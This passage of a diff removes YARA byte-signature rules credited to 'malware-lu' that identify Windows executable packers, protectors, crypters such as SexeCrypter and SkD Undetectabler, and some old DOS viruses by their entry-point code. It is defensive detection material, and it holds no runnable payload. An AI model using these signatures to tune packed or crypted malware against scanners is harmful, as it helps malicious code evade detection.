-		$a0 = { B8 ?? ?? BA ?? ?? 05 ?? ?? 3B 2D 73 ?? 72 ?? B4 09 BA ?? ?? CD 21 CD 90 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule GoatsMutilatorV16Goat_e0f
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E8 EA 0B 00 00 ?? ?? ?? 8B 1C 79 F6 63 D8 8D 22 B0 BF F6 49 08 C3 02 BD 3B 6C 29 46 13 28 5D }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule Armadillo430aSiliconRealmsToolworks
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 44 64 65 44 61 74 61 20 69 6E 69 74 69 61 6C 69 7A 65 64 20 28 41 4E 53 49 29 2C 20 61 70 70 20 73 74 72 69 6E 67 73 20 61 72 65 20 27 25 73 27 20 61 6E 64 20 27 25 73 27 00 00 00 44 64 65 44 61 74 61 20 69 6E 69 74 69 61 6C 69 7A 65 64 20 28 55 4E 49 43 }
-
-condition:
-		$a0
-}
-	
-	
-rule Upackv038betaDwing
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { BE B0 11 ?? ?? AD 50 FF 76 34 EB 7C 48 01 ?? ?? 0B 01 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 18 10 00 00 10 00 00 00 00 ?? ?? ?? 00 00 ?? ?? 00 10 00 00 00 02 00 00 04 00 00 00 00 00 38 00 04 00 00 00 00 00 00 00 00 ?? ?? ?? 00 02 00 00 00 00 00 00 }
-	$a1 = { BE B0 11 ?? ?? AD 50 FF 76 34 EB 7C 48 01 ?? ?? 0B 01 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 18 10 00 00 10 00 00 00 00 ?? ?? ?? 00 00 ?? ?? 00 10 00 00 00 02 00 00 04 00 00 00 00 00 38 00 04 00 00 00 00 00 00 00 00 ?? ?? ?? 00 02 00 00 00 00 00 00 ?? 00 00 ?? 00 00 ?? 00 00 ?? ?? 00 00 00 10 00 00 10 00 00 00 00 00 00 0A 00 00 00 00 00 00 00 00 00 00 00 EE ?? ?? ?? 14 00 00 00 00 ?? ?? ?? ?? ?? ?? 00 FF 76 38 AD 50 8B 3E BE F0 ?? ?? ?? 6A 27 59 F3 A5 FF 76 04 83 C8 FF 8B DF AB EB 1C 00 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 00 ?? ?? ?? ?? ?? 00 00 00 40 AB 40 B1 04 F3 AB C1 E0 0A B5 ?? F3 AB 8B 7E 0C 57 51 E9 ?? ?? ?? ?? E3 B1 04 D3 E0 03 E8 8D 53 18 33 C0 55 40 51 D3 E0 8B EA 91 FF 56 4C 33 D2 59 D1 E8 13 D2 E2 FA 5D 03 EA 45 59 89 6B 08 56 8B F7 2B F5 F3 A4 AC 5E B1 80 AA 3B 7E 34 0F 82 97 FE FF FF 58 5F 59 E3 1B 8A 07 47 04 18 3C 02 73 F7 8B 07 3C ?? 75 F1 B0 00 0F C8 03 46 38 2B C7 AB E2 E5 5E 5D 59 51 59 46 AD 85 C0 74 1F }
-
-condition:
-		$a0 at pe.entry_point or $a1 at pe.entry_point
-}
-	
-	
-rule DCryptPrivate09bdrmist
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { B9 ?? ?? ?? 00 E8 00 00 00 00 58 68 ?? ?? ?? 00 83 E8 0B 0F 18 00 D0 00 48 E2 FB C3 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule kkrunchyV02XRyd
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { BD ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? FF 4D 08 C6 45 0C 05 8D 7D 14 31 C0 B4 04 89 C1 F3 AB BF ?? ?? ?? ?? 57 BE ?? ?? ?? ?? 31 C9 41 FF 4D 0C 8D 9C 8D A0 00 00 00 FF D6 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule SkDUndetectabler3NoFSG2MethodSkD
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC 81 EC 10 02 00 00 68 00 02 00 00 8D 85 F8 FD FF FF 50 6A 00 FF 15 38 10 00 01 50 FF 15 3C 10 00 01 8D 8D F8 FD FF FF 51 E8 4F FB FF FF 83 C4 04 8B 15 ?? 16 00 01 52 A1 ?? 16 00 01 50 E8 50 FF FF FF 83 C4 08 A3 ?? 16 00 01 C7 85 F4 FD FF FF 00 00 00 00 EB 0F 8B 8D F4 FD FF FF 83 C1 01 89 8D F4 FD FF FF 8B 95 F4 FD FF FF 3B 15 ?? 16 00 01 73 1C 8B 85 F4 FD FF FF 8B 0D ?? 16 00 01 8D 54 01 07 81 FA 74 10 00 01 75 02 EB 02 EB C7 8B 85 F4 FD FF FF 50 E8 ?? 00 00 00 83 C4 04 89 85 F0 FD FF FF 8B 8D F0 FD FF FF 89 4D FC C7 45 F8 00 00 00 00 EB 09 8B 55 F8 83 C2 01 89 55 F8 8B 45 F8 3B 85 F4 FD FF FF 73 15 8B 4D FC 03 4D F8 8B 15 ?? 16 00 01 03 55 F8 8A 02 88 01 EB D7 83 3D ?? 16 00 01 00 74 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule NTPacker10ErazerZ
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC 83 C4 E0 53 33 C0 89 45 E0 89 45 E4 89 45 E8 89 45 EC B8 ?? ?? 40 00 E8 ?? ?? FF FF 33 C0 55 68 ?? ?? 40 00 64 FF 30 64 89 20 8D 4D EC BA ?? ?? 40 00 A1 ?? ?? 40 00 E8 ?? FC FF FF 8B 55 EC B8 ?? ?? 40 00 E8 ?? ?? FF FF 8D 4D E8 BA ?? ?? 40 00 A1 ?? ?? 40 00 E8 ?? FE FF FF 8B 55 E8 B8 ?? ?? 40 00 E8 ?? ?? FF FF B8 ?? ?? 40 00 E8 ?? FB FF FF 8B D8 A1 ?? ?? 40 00 BA ?? ?? 40 00 E8 ?? ?? FF FF 75 26 8B D3 A1 ?? ?? 40 00 E8 ?? ?? FF FF 84 C0 75 2A 8D 55 E4 33 C0 E8 ?? ?? FF FF 8B 45 E4 8B D3 E8 ?? ?? FF FF EB 14 8D 55 E0 33 C0 E8 ?? ?? FF FF 8B 45 E0 8B D3 E8 ?? ?? FF FF 6A 00 E8 ?? ?? FF FF 33 C0 5A 59 59 64 89 10 68 ?? ?? 40 00 8D 45 E0 BA 04 00 00 00 E8 ?? ?? FF FF C3 E9 ?? ?? FF FF EB EB 5B E8 ?? ?? FF FF 00 00 00 FF FF FF FF 01 00 00 00 25 00 00 00 FF FF FF FF 01 00 00 00 5C 00 00 00 FF FF FF FF 06 00 00 00 53 45 52 56 45 52 00 00 FF FF FF FF 01 00 00 00 31 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule SexeCrypter11bysantasdad
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC 83 C4 EC 53 56 57 33 C0 89 45 EC B8 D8 39 00 10 E8 30 FA FF FF 33 C0 55 68 D4 3A 00 10 64 FF 30 64 89 ?? ?? ?? ?? E4 3A 00 10 A1 00 57 00 10 50 E8 CC FA FF FF 8B D8 53 A1 00 57 00 10 50 E8 FE FA FF FF 8B F8 53 A1 00 57 00 10 50 E8 C8 FA FF FF 8B D8 53 E8 C8 FA FF FF 8B F0 85 F6 74 26 8B D7 4A B8 14 57 00 10 E8 AD F6 FF FF B8 14 57 00 10 E8 9B F6 FF FF 8B CF 8B D6 E8 DA FA FF FF 53 E8 84 FA FF FF 8D 4D EC BA F8 3A 00 10 A1 14 57 00 10 E8 0A FB FF FF 8B 55 EC B8 14 57 00 10 E8 65 F5 FF FF B8 14 57 00 10 E8 63 F6 FF FF E8 52 FC FF FF 33 C0 5A 59 59 64 89 10 68 DB 3A 00 10 8D 45 EC E8 ED F4 FF FF C3 E9 83 EF FF FF EB F0 5F 5E 5B E8 ED F3 FF FF 00 53 45 54 54 49 4E 47 53 00 00 00 00 FF FF FF FF 12 00 00 00 6B 75 74 68 37 36 67 62 62 67 36 37 34 76 38 38 67 79 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule VxGotcha879
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E8 ?? ?? 5B 81 EB ?? ?? 9C FC 2E ?? ?? ?? ?? ?? ?? ?? 8C D8 05 ?? ?? 2E ?? ?? ?? ?? 50 2E ?? ?? ?? ?? ?? ?? 8B C3 05 ?? ?? 8B F0 BF 00 01 B9 20 00 F3 A4 0E B8 00 01 50 B8 DA DA CD 21 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule MZ0oPE106bTaskFall
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { EB CA 89 03 83 C3 04 87 FE 32 C0 AE 75 FD 87 FE 80 3E FF 75 E2 46 5B 83 C3 04 53 8B 1B 80 3F FF 75 C9 8B E5 61 68 ?? ?? ?? ?? C3 }
-	$a1 = { EB CA 89 03 83 C3 04 87 FE 32 C0 AE 75 FD 87 FE 80 3E FF 75 E2 46 5B 83 C3 04 53 8B 1B 80 3F FF 75 C9 8B E5 61 68 ?? ?? ?? ?? C3 FC B2 80 33 DB A4 B3 02 E8 6D 00 00 00 73 F6 33 C9 E8 64 00 00 00 73 1C 33 C0 E8 5B 00 00 00 73 23 B3 02 41 B0 10 E8 4F 00 00 00 12 C0 73 F7 75 3F AA EB D4 E8 4D 00 00 00 2B CB 75 10 E8 42 00 00 00 EB 28 AC D1 E8 74 4C 13 C9 EB 1C 91 48 C1 E0 08 AC E8 2C 00 00 00 3D 00 7D 00 00 73 0A 80 FC 05 73 06 83 F8 7F 77 02 41 41 95 8B C5 B3 01 56 8B F7 2B F0 F3 A4 5E EB 8E 02 D2 75 05 8A 16 46 12 D2 C3 33 C9 41 E8 EE FF FF FF 13 C9 E8 E7 FF FF FF 72 F2 C3 }
-
-condition:
-		$a0 at pe.entry_point or $a1 at pe.entry_point
-}
-	
-	
-rule SoftDefenderv11xRandyLi
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 74 07 75 05 ?? ?? ?? ?? ?? 74 1F 75 1D ?? 68 ?? ?? ?? 00 59 9C 50 74 0A 75 08 ?? 59 C2 04 00 ?? ?? ?? E8 F4 FF FF FF ?? ?? ?? 78 0F 79 0D }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule Upackv010v012BetaDwing
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { BE 48 01 ?? ?? ?? ?? ?? 95 A5 33 C0 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule AHTeamEPProtector03fakeBorlandDelphi6070FEUERRADER
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 90 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 90 FF E0 53 8B D8 33 C0 A3 00 00 00 00 6A 00 E8 00 00 00 FF A3 00 00 00 00 A1 00 00 00 00 A3 00 00 00 00 33 C0 A3 00 00 00 00 33 C0 A3 00 00 00 00 E8 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule STProtectorV15SilentSoftware
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 00 00 00 00 4B 65 52 6E 45 6C 33 32 2E 64 4C 6C 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 }
-
-condition:
-		$a0
-}
-	
-	
-rule ASPackv105bAlexeySolodovnikov
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 E8 ?? ?? ?? ?? 5D 81 ED CE 3A 44 ?? B8 C8 3A 44 ?? 03 C5 2B 85 B5 3E 44 ?? 89 85 C1 3E 44 ?? 80 BD AC 3E 44 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule EXECryptor226minimumprotection
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 50 68 ?? ?? ?? ?? 58 81 E0 ?? ?? ?? ?? E9 ?? ?? ?? 00 87 0C 24 59 E8 ?? ?? ?? 00 89 45 F8 E9 ?? ?? ?? ?? 0F 83 ?? ?? ?? 00 E9 ?? ?? ?? ?? 87 14 24 5A 57 68 ?? ?? ?? ?? E9 ?? ?? ?? ?? 58 81 C0 ?? ?? ?? ?? 2B 05 ?? ?? ?? ?? 81 C8 ?? ?? ?? ?? 81 E0 ?? ?? ?? ?? E9 ?? ?? ?? 00 C3 E9 ?? ?? ?? ?? C3 BF ?? ?? ?? ?? 81 CB ?? ?? ?? ?? BA ?? ?? ?? ?? 52 E9 ?? ?? ?? 00 E8 ?? ?? ?? 00 E9 ?? ?? ?? 00 E9 ?? ?? ?? ?? 87 34 24 5E 66 8B 00 66 25 ?? ?? E9 ?? ?? ?? ?? 8B CD 87 0C 24 8B EC 51 89 EC 5D 8B 05 ?? ?? ?? ?? 09 C0 E9 ?? ?? ?? ?? 59 81 C1 ?? ?? ?? ?? C1 C1 ?? 23 0D ?? ?? ?? ?? 81 F9 ?? ?? ?? ?? E9 ?? ?? ?? ?? C3 E9 ?? ?? ?? 00 13 D0 0B F9 E9 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 8B 64 24 08 31 C0 64 8F 05 00 00 00 00 5A E9 ?? ?? ?? ?? 3C A4 0F 85 ?? ?? ?? 00 8B 45 FC 66 81 38 ?? ?? 0F 84 05 00 00 00 E9 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? E9 ?? ?? ?? ?? 87 3C 24 5F 31 DB 31 C9 31 D2 68 ?? ?? ?? ?? E9 ?? ?? ?? ?? 89 45 FC 33 C0 89 45 F4 83 7D FC 00 E9 ?? ?? ?? ?? 53 52 8B D1 87 14 24 81 C0 ?? ?? ?? ?? 0F 88 ?? ?? ?? ?? 3B CB }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PEProtector093CRYPToCRACk
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 5B 81 E3 00 FF FF FF 66 81 3B 4D 5A 75 33 8B F3 03 73 3C 81 3E 50 45 00 00 75 26 0F B7 46 18 8B C8 69 C0 AD 0B 00 00 F7 E0 2D AB 5D 41 4B 69 C9 DE C0 00 00 03 C1 75 09 83 EC 04 0F 85 DD 00 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PellesC300400450EXEX86CRTLIB
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 89 E5 6A FF 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 64 FF 35 ?? ?? ?? ?? 64 89 25 ?? ?? ?? ?? 83 EC ?? 53 56 57 89 65 E8 68 00 00 00 02 E8 ?? ?? ?? ?? 59 A3 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule RLPackv118BasicaPLibAp0x
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 E8 00 00 00 00 8B 2C 24 83 C4 04 8D B5 1A 04 00 00 8D 9D C1 02 00 00 33 FF E8 61 01 00 00 EB 0F FF 74 37 04 FF 34 37 FF D3 83 C4 08 83 C7 08 83 3C 37 00 75 EB 83 BD 06 04 00 00 00 74 0E 83 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule vfpexeNcV500WangJianGuo
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 E8 00 00 00 00 5D ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 50 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 CC }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule FreeJoiner153Stubengine17GlOFF
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E8 33 FD FF FF 50 E8 0D 00 00 00 CC FF 25 08 20 40 00 FF 25 0C 20 40 00 FF 25 10 20 40 00 FF 25 14 20 40 00 FF 25 18 20 40 00 FF 25 1C 20 40 00 FF 25 20 20 40 00 FF 25 24 20 40 00 FF 25 28 20 40 00 FF 25 00 20 40 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule TheHypersprotectorTheHyper
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC 83 EC 14 8B FC E8 14 00 00 00 ?? ?? 01 01 ?? ?? 01 01 ?? ?? ?? 00 ?? ?? 01 01 ?? ?? 02 01 5E E8 0D 00 00 00 6B 65 72 6E 65 6C 33 32 2E 64 6C 6C 00 8B 46 04 FF 10 8B D8 E8 0D 00 00 00 56 69 72 74 75 61 6C 41 6C 6C 6F 63 00 53 8B 06 FF 10 89 07 E8 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule ANDpakk2006DmitryAndreev
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 FC BE D4 00 40 00 BF 00 10 00 01 57 83 CD FF 33 C9 F9 EB 05 A4 02 DB 75 05 8A 1E 46 12 DB 72 F4 33 C0 40 02 DB 75 05 8A 1E 46 12 DB 13 C0 02 DB 75 05 8A 1E 46 12 DB 72 0E 48 02 DB 75 05 8A 1E 46 12 DB 13 C0 EB DC 83 E8 03 72 0F C1 E0 08 AC 83 F0 FF 74 4D D1 F8 8B E8 EB 09 02 DB 75 05 8A 1E 46 12 DB 13 C9 02 DB 75 05 8A 1E 46 12 DB 13 C9 75 1A 41 02 DB 75 05 8A 1E 46 12 DB 13 C9 02 DB 75 05 8A 1E 46 12 DB 73 EA 83 C1 02 81 FD 00 FB FF FF 83 D1 01 56 8D 34 2F F3 A4 5E E9 73 FF FF FF C3 }
-
-condition:
-		$a0
-}
-	
-	
-rule Thinstall2628Jtit
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E8 00 00 00 00 58 BB 34 1D 00 00 2B C3 50 68 00 00 40 00 68 00 40 00 00 68 BC 00 00 00 E8 C3 FE FF FF E9 99 FF FF FF CC CC CC CC CC CC CC CC CC CC 55 8B EC 83 C4 F4 FC 53 57 56 8B 75 08 8B 7D 0C C7 45 FC 08 00 00 00 33 DB BA 00 00 00 80 43 33 C0 E8 19 01 }
-	$a1 = { E8 00 00 00 00 58 BB 34 1D 00 00 2B C3 50 68 00 00 40 00 68 00 40 00 00 68 BC 00 00 00 E8 C3 FE FF FF E9 99 FF FF FF CC CC CC CC CC CC CC CC CC CC 55 8B EC 83 C4 F4 FC 53 57 56 8B 75 08 8B 7D 0C C7 45 FC 08 00 00 00 33 DB BA 00 00 00 80 43 33 C0 E8 19 01 00 00 73 0E 8B 4D F8 E8 27 01 00 00 02 45 F7 AA EB E9 E8 04 01 00 00 0F 82 96 00 00 00 E8 F9 00 00 00 73 5B B9 04 00 00 00 E8 05 01 00 00 48 74 DE 0F 89 C6 00 00 00 E8 DF 00 00 00 73 1B 55 BD 00 01 00 00 E8 DF 00 00 00 88 07 47 4D 75 F5 E8 C7 00 00 00 72 E9 5D EB A2 B9 01 00 00 00 E8 D0 00 00 00 83 C0 07 89 45 F8 C6 45 F7 00 83 F8 08 74 89 E8 B1 00 00 00 88 45 F7 E9 7C FF FF FF B9 07 00 00 00 E8 AA 00 00 00 50 33 C9 B1 02 E8 A0 00 00 00 8B C8 41 41 58 0B C0 74 04 8B D8 EB 5E 83 F9 02 74 6A 41 E8 88 00 00 00 89 45 FC E9 48 FF FF FF E8 87 00 00 00 49 E2 09 8B C3 E8 7D 00 00 00 EB 3A 49 8B C1 55 8B 4D FC 8B E8 33 C0 D3 E5 E8 5D 00 00 00 0B C5 5D 8B D8 E8 5F 00 00 00 3D 00 00 01 00 73 14 3D FF 37 00 00 73 0E 3D 7F 02 00 00 73 08 83 F8 7F 77 04 41 41 41 41 56 8B F7 2B F0 F3 }
-
-condition:
-		$a0 at pe.entry_point or $a1 at pe.entry_point
-}
-	
-	
-rule UPXModifierv01x
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 50 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 83 CD }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule Obsidium1333ObsidiumSoftware
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { EB 02 ?? ?? E8 29 00 00 00 EB 03 ?? ?? ?? EB 03 ?? ?? ?? 8B 54 24 0C EB 01 ?? 83 82 B8 00 00 00 28 EB 03 ?? ?? ?? 33 C0 EB 01 ?? C3 EB 04 ?? ?? ?? ?? EB 02 ?? ?? 64 67 FF 36 00 00 EB 04 ?? ?? ?? ?? 64 67 89 26 00 00 EB 02 ?? ?? EB 04 ?? ?? ?? ?? 50 EB 04 }
-	$a1 = { EB 02 ?? ?? E8 29 00 00 00 EB 03 ?? ?? ?? EB 03 ?? ?? ?? 8B 54 24 0C EB 01 ?? 83 82 B8 00 00 00 28 EB 03 ?? ?? ?? 33 C0 EB 01 ?? C3 EB 04 ?? ?? ?? ?? EB 02 ?? ?? 64 67 FF 36 00 00 EB 04 ?? ?? ?? ?? 64 67 89 26 00 00 EB 02 ?? ?? EB 04 ?? ?? ?? ?? 50 EB 04 ?? ?? ?? ?? 33 C0 EB 01 ?? 8B 00 EB 03 ?? ?? ?? C3 EB 03 ?? ?? ?? E9 FA 00 00 00 EB 03 ?? ?? ?? E8 D5 FF FF FF EB 04 ?? ?? ?? ?? EB 04 ?? ?? ?? ?? 58 EB 01 ?? EB 03 ?? ?? ?? 64 67 8F 06 00 00 EB 04 ?? ?? ?? ?? 83 C4 04 EB 04 ?? ?? ?? ?? E8 2B 27 }
-
-condition:
-		$a0 at pe.entry_point or $a1 at pe.entry_point
-}
-	
-	
-rule PureBasic4xNeilHodgson
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 68 ?? ?? 00 00 68 00 00 00 00 68 ?? ?? ?? 00 E8 ?? ?? ?? 00 83 C4 0C 68 00 00 00 00 E8 ?? ?? ?? 00 A3 ?? ?? ?? 00 68 00 00 00 00 68 00 10 00 00 68 00 00 00 00 E8 ?? ?? ?? 00 A3 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule VxAugust16thIronMaiden
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { BA 79 02 03 D7 B4 1A CD 21 B8 24 35 CD 21 5F 57 89 9D 4E 02 8C 85 50 02 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule VProtector10Xvcasm
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC 6A FF 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 E8 03 00 00 00 C7 84 00 58 EB 01 E9 83 C0 07 50 C3 FF 35 E8 03 00 00 00 C7 84 00 58 EB 01 E9 83 C0 07 50 C3 FF 35 E8 07 00 00 00 C7 83 83 C0 13 EB 0B 58 EB 02 CD 20 83 C0 02 EB 01 E9 50 C3 E8 B9 04 00 00 00 E8 1F 00 00 00 EB FA E8 16 00 00 00 E9 EB F8 00 00 58 EB 09 0F 25 E8 F2 FF FF FF 0F B9 49 75 F1 EB 05 EB F9 EB F0 D6 EB 01 0F 31 F0 EB 0C 33 C8 EB 03 EB 09 0F 59 74 05 75 F8 51 EB F1 E8 16 00 00 00 8B 5C 24 0C 8B A3 C4 00 00 00 64 8F 05 00 00 00 00 83 C4 04 EB 14 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 33 C9 99 F7 F1 E9 E8 05 00 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PEPACK099
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 E8 00 00 00 00 5D 83 ED 06 80 BD E0 04 00 00 01 0F 84 F2 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule Freshbindv20gFresh
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 64 A1 00 00 00 00 55 89 E5 6A FF 68 1C A0 41 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule UPXSCRAMBLER306OnToL
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E8 00 00 00 00 59 83 C1 07 51 C3 C3 BE ?? ?? ?? ?? 83 EC 04 89 34 24 B9 80 00 00 00 81 36 ?? ?? ?? ?? 50 B8 04 00 00 00 50 03 34 24 58 58 83 E9 03 E2 E9 EB D6 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PECompact2xxBitSumTechnologies
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { B8 ?? ?? ?? ?? 50 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 33 C0 89 08 50 45 43 6F 6D 70 61 63 74 32 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PESpinv01Cyberbob
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 5C CB 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 A3 68 72 01 FF 5D 33 C9 41 E2 17 EB 07 EA EB 01 EB EB 0D FF }
-	$a1 = { EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 5C CB 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 A3 68 72 01 FF 5D 33 C9 41 E2 17 EB 07 EA EB 01 EB EB 0D FF E8 01 00 00 00 EA 5A 83 EA 0B FF E2 8B 95 B3 28 40 00 8B 42 3C 03 C2 89 85 BD 28 40 00 41 C1 E1 07 8B 0C 01 03 CA 8B 59 10 03 DA 8B 1B 89 9D D1 28 40 00 53 8F 85 C4 27 40 00 BB ?? 00 00 00 B9 A5 08 00 00 8D BD 75 29 40 00 4F 30 1C 39 FE CB E2 F9 68 2D 01 00 00 59 8D BD AA 30 40 00 C0 0C 39 02 E2 FA E8 02 00 00 00 FF 15 5A 8D 85 07 4F 56 00 BB 54 13 0B 00 D1 E3 2B C3 FF E0 E8 01 00 00 00 68 E8 1A 00 00 00 8D 34 28 B8 ?? ?? ?? ?? 2B C9 83 C9 15 0F A3 C8 0F 83 81 00 00 00 8D B4 0D C4 28 40 00 8B D6 B9 10 00 00 00 AC 84 C0 74 06 C0 4E FF 03 E2 F5 E8 00 00 00 00 59 81 C1 1D 00 00 00 52 51 C1 E9 05 23 D1 FF }
-
-condition:
-		$a0 at pe.entry_point or $a1 at pe.entry_point
-}
-	
-	
-rule VxEddie2100
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E8 ?? ?? 4F 4F 0E E8 ?? ?? 47 47 1E FF ?? ?? CB E8 ?? ?? 84 C0 ?? ?? 50 53 56 57 1E 06 B4 51 CD 21 8E C3 ?? ?? ?? ?? ?? ?? ?? 8B F2 B4 2F CD 21 AC }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule NETexecutableMicrosoft
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 00 00 00 00 00 00 00 00 5F 43 6F 72 45 78 65 4D 61 69 6E 00 6D 73 63 6F 72 65 65 2E 64 6C 6C 00 00 00 00 00 FF 25 }
-
-condition:
-		$a0
-}
-	
-	
-rule tElockv098
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E9 25 E4 FF FF 00 00 00 ?? ?? ?? ?? 1E }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule AZProtect0001byAlexZakaAZCRC
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { EB 70 FC 60 8C 80 4D 11 00 70 25 81 00 40 0D 91 BB 60 8C 80 4D 11 00 70 21 81 1D 61 0D 81 00 40 CE 60 8C 80 4D 11 00 70 25 81 25 81 25 81 25 81 29 61 41 81 31 61 1D 61 00 40 B7 30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 BE 00 ?? ?? 00 BF 00 00 40 00 EB 17 4B 45 52 4E 45 4C 33 32 2E 44 4C 4C 00 00 00 00 00 FF 25 ?? ?? ?? 00 8B C6 03 C7 8B F8 57 55 8B EC 05 7F 00 00 00 50 E8 E5 FF FF FF BA 8C ?? ?? 00 89 02 E9 1A 01 00 00 ?? 00 00 00 47 65 74 4D 6F 64 75 6C 65 46 69 6C 65 4E 61 6D 65 41 00 47 65 74 56 6F 6C 75 6D 65 49 6E 66 6F 72 6D 61 74 69 6F 6E 41 00 4D 65 73 73 61 67 65 42 6F 78 41 00 45 78 69 74 50 72 6F 63 65 73 73 00 47 65 74 4D 6F 64 75 6C 65 48 61 6E 64 6C 65 41 }
